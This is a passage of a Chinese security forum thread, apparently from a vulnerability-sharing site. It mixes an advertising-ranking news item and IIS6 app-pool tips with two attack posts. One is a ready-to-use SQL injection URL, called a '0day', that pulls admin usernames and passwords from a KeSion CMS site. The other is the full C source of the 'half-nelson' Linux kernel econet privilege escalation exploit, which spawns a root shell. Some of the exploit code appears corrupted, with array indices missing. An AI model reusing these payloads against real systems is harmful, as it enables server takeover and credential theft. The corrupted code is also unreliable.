返回列表 发帖

2010年第三季度门户类网站网络广告投放排行

 据悉,2010年10月20日缔元信网络广告行业监测系统发布了“门户类网站第三季度网络广告投放排行”。  根据缔元信网络广告行业监测系统发布的2010年“门户类网站第三季度网络广告投放排行”数据显示,排在第一位的广告主VANCL凡客诚品,在月度排名中就一直是以第一名的网络广告投放量绝对领先,在第三季度总体的网络广告投放量排名中,高出第二名95404。
  同时,值得关注的是,第三季度排行前十的门户类网站网络广告投放中,服装类公司占据了主要位置,除维思诺(北京)科技有限公司、汉王科技股份有限公司、淘宝网三家公司外,其它七家公司都是自主服装品牌的主力部队,其中淘宝网的大部分广告也是以服饰为主。
  相关定义:
  广告投放天次:在统计周期和被统计媒体范围内,广告以天为单位计的累计投放量。即广告投放天次=广告投放量×广告投放天数。

  缔元信行业数据板块中第三季度门户类网站网络广告投放排行数据来源于缔元信网络广告行业监测系统AdsRating。该系统采用智能化的互联网信息抓取与分析技术,及时、全面地反映互联网广告投放量、广告主、广告创意等多方面的变化情况。
附件: 您需要登录才可以下载或查看附件。没有帐号?进入圈子
非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小一发表,本帖发表者小一符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小一和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

科讯6.x-7.06 regajax.asp注入0day
http://www.sitedirsec.com/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Linux Kernel<2.6.36.2 econet特权升级EXP
/*
* half-nelson.c
*
* Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
*   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3848
*
*   Stack-based buffer overflow in the econet_sendmsg function in
*   net/econet/af_econet.c in the Linux kernel before 2.6.36.2, when an
*   econet address is configured, allows local users to gain privileges by
*   providing a large number of iovec structures.
*
*   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3850
*
*   The ec_dev_ioctl function in net/econet/af_econet.c in the Linux kernel
*   before 2.6.36.2 does not require the CAP_NET_ADMIN capability, which
*   allows local users to bypass intended access restrictions and configure
*   econet addresses via an SIOCSIFADDR ioctl call.
*
*   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4073
*
*   The ipc subsystem in the Linux kernel before 2.6.37-rc1 does not
*   initialize certain structures, which allows local users to obtain
*   potentially sensitive information from kernel stack memory.
*
* Usage:
*
*   $ gcc half-nelson.c -o half-nelson -lrt
*   $ ./half-nelson
*   [+] looking for symbols...
*   [+] resolved symbol commit_creds to 0xffffffff81088ad0
*   [+] resolved symbol prepare_kernel_cred to 0xffffffff81088eb0
*   [+] resolved symbol ia32_sysret to 0xffffffff81046692
*   [+] spawning children to achieve adjacent kstacks...
*   [+] found parent kstack at 0xffff88001c6ca000
*   [+] found adjacent children kstacks at 0xffff88000d10a000 and 0xffff88000d10c000
*   [+] lower child spawning a helper...
*   [+] lower child calling compat_sys_wait4 on helper...
*   [+] helper going to sleep...
*   [+] upper child triggering stack overflow...
*   [+] helper woke up
*   [+] lower child returned from compat_sys_wait4
*   [+] parent's restart_block has been clobbered
*   [+] escalating privileges...
*   [+] launching root shell!
*   # id
*   uid=0(root) gid=0(root)
*
* Notes:
*
*   This exploit leverages three vulnerabilities to escalate privileges.
*   The primary vulnerability is a kernel stack overflow, not a stack buffer
*   overflow as the CVE description incorrectly states. I believe this is the
*   first public exploit for a kernel stack overflow, and it turns out to be
*   a bit tricky due to some particulars of the econet vulnerability. A full
*   breakdown of the exploit is forthcoming.
*
*   Tested on Ubuntu 10.04 LTS (2.6.32-21-generic).
*/

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <syscall.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/syscall.h>
#include <netinet/in.h>
#include <net/if.h>

#define IOVS           446
#define NPROC          1024
#define KSTACK_SIZE    8192

#define KSTACK_UNINIT  0
#define KSTACK_UPPER   1
#define KSTACK_LOWER   2
#define KSTACK_DIE     3
#define KSTACK_PARENT  4
#define KSTACK_CLOBBER 5

#define LEAK_BASE      0xffff880000000000
#define LEAK_TOP       0xffff8800c0000000
#define LEAK_DEPTH     500
#define LEAK_OFFSET    32

#define NR_IPC         0x75
#define NR_WAIT4       0x72
#define SEMCTL         0x3

#ifndef PF_ECONET
#define PF_ECONET      19
#endif

#define STACK_OFFSET   6
#define RESTART_OFFSET 40

struct ec_addr {
    unsigned char station;
    unsigned char net;
};

struct sockaddr_ec {
    unsigned short sec_family;
    unsigned char port;
    unsigned char cb;
    unsigned char type;
    struct ec_addr addr;
    unsigned long cookie;
};

struct ipc64_perm {
    uint32_t key;
    uint32_t uid;
    uint32_t gid;
    uint32_t cuid;
    uint32_t cgid;
    uint32_t mode;
    uint16_t seq;
    uint16_t __pad2;
    unsigned long __unused1;
    unsigned long __unused2;
};

struct semid64_ds {
    struct ipc64_perm sem_perm;
    unsigned long sem_otime;
    unsigned long __unused1;
    unsigned long sem_ctime;
    unsigned long __unused;
    unsigned long sem_nsems;
    unsigned long __unused3;
    unsigned long __unused4;
};

union semun {
    int val;
    struct semid_ds *buf;
    unsigned short *array;
    struct seminfo *__buf;
};

struct region {
    unsigned long parent;
    unsigned long addrs[NPROC];
};
struct region *region;

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long ia32_sysret;
  
void __attribute__((regparm(3)))
kernel_code(void)
{
    commit_creds(prepare_kernel_cred(0));
}

void
payload_parent(void)
{
    asm volatile (
        "mov $kernel_code, %rax
"
        "call *%rax
"
    );
}

void
payload_child(void)
{
    asm volatile (
        "movq $payload_parent, (%0)
"
        "jmpq *%1
"
        :
        : "r"(region->parent + RESTART_OFFSET), "r"(ia32_sysret)
    );
}

unsigned long
get_kstack(void)
{
    int i, size, offset;
    union semun *arg;
    struct semid_ds dummy;
    struct semid64_ds *leaked;
    char *stack_start, *stack_end;
    unsigned char *p;
    unsigned long kstack, *ptr;

    /* make sure our argument is 32-bit accessible */
    arg = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);
    if (arg == MAP_FAILED) {
        printf("[-] failure mapping memory, aborting!
");
        exit(1);
    }

    /* map a fake stack to use during syscall */
    stack_start = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);
    if (stack_start == MAP_FAILED) {
        printf("[-] failure mapping memory, aborting!
");
        exit(1);
    }
    stack_end = stack_start + 4096;

    memset(arg, 0, sizeof(union semun));
    memset(&amp;dummy, 0, sizeof(struct semid_ds));
    arg->buf = &amp;dummy;

    /* syscall(NR_IPC, SEMCTL, 0, 0, IPC_SET, arg) */
    asm volatile (
        "push %%rax
"
        "push %%rbx
"
        "push %%rcx
"
        "push %%rdx
"
        "push %%rsi
"
        "push %%rdi
"
        "movl %0, %%eax
"
        "movl %1, %%ebx
"
        "movl %2, %%ecx
"
        "movl %3, %%edx
"
        "movl %4, %%esi
"
        "movq %5, %%rdi
"
        "movq %%rsp, %%r8
"
        "movq %6, %%rsp
"
        "push %%r8
"
        "int $0x80
"
        "pop %%r8
"
        "movq %%r8, %%rsp
"
        "pop %%rdi
"
        "pop %%rsi
"
        "pop %%rdx
"
        "pop %%rcx
"
        "pop %%rbx
"
        "pop %%rax
"
        :
        : "r"(NR_IPC), "r"(SEMCTL), "r"(0), "r"(0), "r"(IPC_SET), "r"(arg), "r"(stack_end)
        : "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi", "r8"
    );

    /* naively extract a pointer to the kstack from the kstack */
    p = stack_end - (sizeof(unsigned long) + sizeof(struct semid64_ds)) + LEAK_OFFSET;
    kstack = *(unsigned long *) p;

    if (kstack < LEAK_BASE || kstack > LEAK_TOP) {
        printf("[-] failed to leak a suitable kstack address, try again!
");
        exit(1);
    }
    if ((kstack % 0x1000) < (0x1000 - LEAK_DEPTH)) {
        printf("[-] failed to leak a suitable kstack address, try again!
");
        exit(1);
    }

    kstack = kstack &amp; ~0x1fff;
     
    return kstack;
}

unsigned long
get_symbol(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy, sym[512];
    int ret = 0;
  
    f = fopen("/proc/kallsyms", "r");
    if (!f) {
        return 0;
    }
  
    while (ret != EOF) {
        ret = fscanf(f, "%p %c %s
", (void **) &amp;addr, &amp;dummy, sym);
        if (ret == 0) {
            fscanf(f, "%s
", sym);
            continue;
        }
        if (!strcmp(name, sym)) {
            printf("[+] resolved symbol %s to %p
", name, (void *) addr);
            fclose(f);
            return addr;
        }
    }
    fclose(f);
  
    return 0;
}

int
get_adjacent_kstacks(void)
{
    int i, ret, shm, pid, type;

    /* create shared communication channel between parent and its children */
    shm = shm_open("/halfnelson", O_RDWR | O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO);
    if (shm < 0) {
        printf("[-] failed creating shared memory, aborting!
");
        exit(1);
    }

    ret = ftruncate(shm, sizeof(struct region));
    if (ret != 0) {
        printf("[-] failed resizing shared memory, aborting!
");
        exit(1);
    }

    region = mmap(NULL, sizeof(struct region), PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0);
    memset(region, KSTACK_UNINIT, sizeof(struct region));

    /* parent kstack self-discovery */
    region->parent = get_kstack();

    printf("[+] found parent kstack at 0x%lx
", region->parent);

    /* fork and discover children with adjacently-allocated kernel stacks */
    for (i = 0; i < NPROC; ++i) {
        pid = fork();

        if (pid > 0) {
            type = KSTACK_PARENT;
            continue;
        } else if (pid == 0) {
            /* children do kstack self-discovery */
            region->addrs = get_kstack();

            /* children sleep until parent has found adjacent children */
            while (1) {
                sleep(1);
                if (region->addrs == KSTACK_DIE) {
                    /* parent doesn't need us :-( */
                    exit(0);
                } else if (region->addrs == KSTACK_UPPER) {
                    /* we're the upper adjacent process */
                    type = KSTACK_UPPER;
                    break;
                } else if (region->addrs == KSTACK_LOWER) {
                    /* we're the lower adjacent process */
                    type = KSTACK_LOWER;
                    break;
                }
            }
            break;
        } else {
            printf("[-] fork failed, aborting!
");
            exit(1);
        }
    }

    return type;
}

void
do_parent(void)
{
    int i, j, upper, lower;

    /* parent sleeps until we've discovered all the child kstacks */
    while (1) {
        sleep(1);
        for (i = 0; i < NPROC; ++i) {
            if (region->addrs == KSTACK_UNINIT) {
                break;
            }
        }
        if (i == NPROC) {
            break;
        }
    }

    /* figure out if we have any adjacent child kstacks */
    for (i = 0; i < NPROC; ++i) {
        for (j = 0; j < NPROC; ++j) {
            if (region->addrs == region->addrs[j] + KSTACK_SIZE) {
                break;
            }
        }
        if (j != NPROC) {
            break;
        }
    }
    if (i == NPROC &amp;&amp; j == NPROC) {
        printf("[-] failed to find adjacent kstacks, try again!
");
        exit(1);
    }

    upper = i;
    lower = j;

    printf("[+] found adjacent children kstacks at 0x%lx and 0x%lx
", region->addrs[lower], region->addrs[upper]);

    /* signal to non-adjacent children to die */
    for (i = 0; i < NPROC; ++i) {
        if (i != upper &amp;&amp; i != lower) {
            region->addrs = KSTACK_DIE;
        }
    }

    /* signal adjacent children to continue on */
    region->addrs[upper] = KSTACK_UPPER;
    region->addrs[lower] = KSTACK_LOWER;

    /* parent sleeps until child has clobbered the fptr */
    while (1) {
        sleep(1);
        if (region->parent == KSTACK_CLOBBER) {
            break;
        }
    }

    printf("[+] escalating privileges...
");

    /* trigger our clobbered fptr */
    syscall(__NR_restart_syscall);

    /* our privileges should be escalated now */
    if (getuid() != 0) {
        printf("[-] privilege escalation failed, aborting!
");
        exit(1);
    }

    printf("[+] launching root shell!
");

    execl("/bin/sh", "/bin/sh", NULL);
}

void
do_child_upper(void)
{
    int i, ret, eco_sock;
    struct sockaddr_ec eco_addr;
    struct msghdr eco_msg;
    struct iovec iovs[IOVS];
    struct ifreq ifr;
    char *target;

    /* calculate payload target, skip prologue */
    target = (char *) payload_child;
    target += 4;
     
    /* give lower child a chance to enter its wait4 call */
    sleep(1);

    /* write some zeros */
    for (i = 0; i < STACK_OFFSET; ++i) {
        iovs.iov_base = (void *) 0x0;
        iovs.iov_len = 0;
    }

    /* overwrite saved ia32_sysret address on stack */
    iovs[STACK_OFFSET].iov_base = (void *) target;
    iovs[STACK_OFFSET].iov_len = 0x0246;

    /* force abort via EFAULT */
    for (i = STACK_OFFSET + 1; i < IOVS; ++i) {
        iovs.iov_base = (void *) 0xffffffff00000000;
        iovs.iov_len = 0;
    }

    /* create econet socket */
    eco_sock = socket(PF_ECONET, SOCK_DGRAM, 0);
    if (eco_sock < 0) {
        printf("[-] failed creating econet socket, aborting!
");
        exit(1);
    }

    memset(&amp;ifr, 0, sizeof(ifr));
    strcpy(ifr.ifr_name, "lo");

    /* trick econet into associated with the loopback */
    ret = ioctl(eco_sock, SIOCSIFADDR, &amp;ifr);
    if (ret != 0) {
        printf("[-] failed setting interface address, aborting!
");
        exit(1);
    }

    memset(&amp;eco_addr, 0, sizeof(eco_addr));
    memset(&amp;eco_msg, 0, sizeof(eco_msg));
    eco_msg.msg_name = &amp;eco_addr;
    eco_msg.msg_namelen = sizeof(eco_addr);
    eco_msg.msg_flags = 0;
    eco_msg.msg_iov = &amp;iovs[0];
    eco_msg.msg_iovlen = IOVS;

    printf("[+] upper child triggering stack overflow...
");

    /* trigger the kstack overflow into lower child's kstack */
    ret = sendmsg(eco_sock, &amp;eco_msg, 0);
    if (ret != -1 || errno != EFAULT) {
        printf("[-] sendmsg succeeded unexpectedly, aborting!
");
        exit(1);
    }

    close(eco_sock);
}

void
do_child_lower(void)
{
    int pid;

    printf("[+] lower child spawning a helper...
");

    /* fork off a helper to wait4 on */
    pid = fork();
    if (pid == 0) {
        printf("[+] helper going to sleep...
");
        sleep(5);
        printf("[+] helper woke up
");
        exit(1);
    }

    printf("[+] lower child calling compat_sys_wait4 on helper...
");

    /* syscall(NR_WAIT4, pid, 0, 0, 0) */
    asm volatile (
        "push %%rax
"
        "push %%rbx
"
        "push %%rcx
"
        "push %%rdx
"
        "push %%rsi
"
        "movl %0, %%eax
"
        "movl %1, %%ebx
"
        "movl %2, %%ecx
"
        "movl %3, %%edx
"
        "movl %4, %%esi
"
        "int $0x80
"
        "pop %%rsi
"
        "pop %%rdx
"
        "pop %%rcx
"
        "pop %%rbx
"
        "pop %%rax
"
        :
        : "r"(NR_WAIT4), "r"(pid), "r"(0), "r"(0), "r"(0)
        : "memory", "rax", "rbx", "rcx", "rdx", "rsi"
    );

    printf("[+] lower child returned from compat_sys_wait4
");

    printf("[+] parent's restart_block has been clobbered
");

    /* signal parent that our fptr should now be clobbered */
    region->parent = KSTACK_CLOBBER;
}

int
main(int argc, char **argv)
{
    int type;

    if (sizeof(unsigned long) != 8) {
        printf("[-] x86_64 only, sorry!
");
        exit(1);
    }

    printf("[+] looking for symbols...
");
  
    commit_creds = (_commit_creds) get_symbol("commit_creds");
    if (!commit_creds) {
        printf("[-] symbol table not available, aborting!
");
        exit(1);
    }
  
    prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
    if (!prepare_kernel_cred) {
        printf("[-] symbol table not available, aborting!
");
        exit(1);
    }

    ia32_sysret = get_symbol("ia32_sysret");
    if (!ia32_sysret) {
        printf("[-] symbol table not available, aborting!
");
        exit(1);
    }

    printf("[+] spawning children to achieve adjacent kstacks...
");

    type = get_adjacent_kstacks();

    if (type == KSTACK_PARENT) {
        do_parent();
    } else if (type == KSTACK_UPPER) {
        do_child_upper();
    } else if (type == KSTACK_LOWER) {
        do_child_lower();
    }

    return 0;
}


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Windows2003服务器应用池出现假死的常见问题与解决办法
经常见到大家谈起,2003应用池自动死了不能恢复了,一直出现 Service Unavailable 常见方法如下:1:以前没有SP1打补丁的时候会出现这个IIS6.0假死问题,但现在微软都在自动更新里面出补丁了,一般你打好最新补丁后是不会出现此问题了(所以现在的IIS假死与这个关系不是很大).2:从IIS6.0开始CPU资源都在应用池里面限制了,不象以前的IIS5.0,所以假死的池的缘故就是池被拉死,你在网站打不开的时候可以看到你的某个应用池是禁用的,上面出现一个红叉.你鼠标右键启动网站又会自动恢复. 这个原因大概是以下几个因数造成的:(1)你限制了应用池的资源限制,限制得太小.比如:50这样或更少更多一点,这个时候如果你这个池下面的网站占用CPU太高,比如超过50%那么5分钟后他就自动死了,手工默认建立的应用池默认是超过资源不操作.出现上面这个情况解决方法:1.不限制CPU资源(这个是不可取的,不限制资源,有的程序有BUG占用资源厉害了的,服务器都会被拉死,你可能都无法操作服务器)2.在超过资源那里选择(关闭),这个关闭默认是失败5次,90秒内恢复,一般默认就可.网站能自动恢复,这个关闭:不是永久关闭,意思是超过资源关闭,然后在某时间内自动恢复池.不操作就是不恢复,这个是很多人的误区.上次我写过相关的这个讲解了.(2)内存限制在IIS6.0应用池上面有虚拟内存和最大内存限制,如果你设置了这个.那么网站访问量大了也会出现假死,所以不建议设置这里,默认就可.(3)就是服务器自身内存太小,网站运行当然需要使用到内存了,当内存不够的时候应用池也会死掉变成禁用.那么只有等内存全部释放出来才能恢复应用池了.出现这个情况那么你就要考虑加内存或者检查到底是什么程序占用了内存了.比如MSSQL数据库,这个可是吃内存得大户啊,最好别和WEB服务器同时一个服务器上.很多人用1G内存做Windows2003系统,2003NET结构是很占用内存的,所以做服务器选2003还得把内存加到2G或更高才好.内存不够上面2点讲到的,是没办法操作了,也无法自动恢复.(4)就是ACCESS数据库太大或查询太多,这个也会出现把IIS拉死.解决方法:修复ACCESS数据库,或尽量少用ACCESS数据库.(5)不同网站用不同应用池:根据你自己实际情况而定,站点大的最好独立一个应用池,限制他的资源超过了自动回收,看上面 (1)讲到的,这样就不影响其他站点.中型站点:多个网站共用一个应用池,比如5个站点用一个池,设置他资源时间等等.这样他们就算超资源了也不影响其他应用池的网站.(6)设置回收时间:很多人以为设置回收池越短越好,其实是错误的,每次回收当然是把内存回收回来了,但加重了一次服务器的负担,当服务器比较繁忙的时候,有可能导致其他应用池死.所以建议设置共1000就行了.其他独立池按照他网站流量而设置可以设置600也行,共用的不建议设置太短.(7)网站后台过不了多久自动退出又要重新登陆:这个情况就是你设置回收时间太短了,按照6点设置吧.不要设置什么20分,30分这样的,这样不好.


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表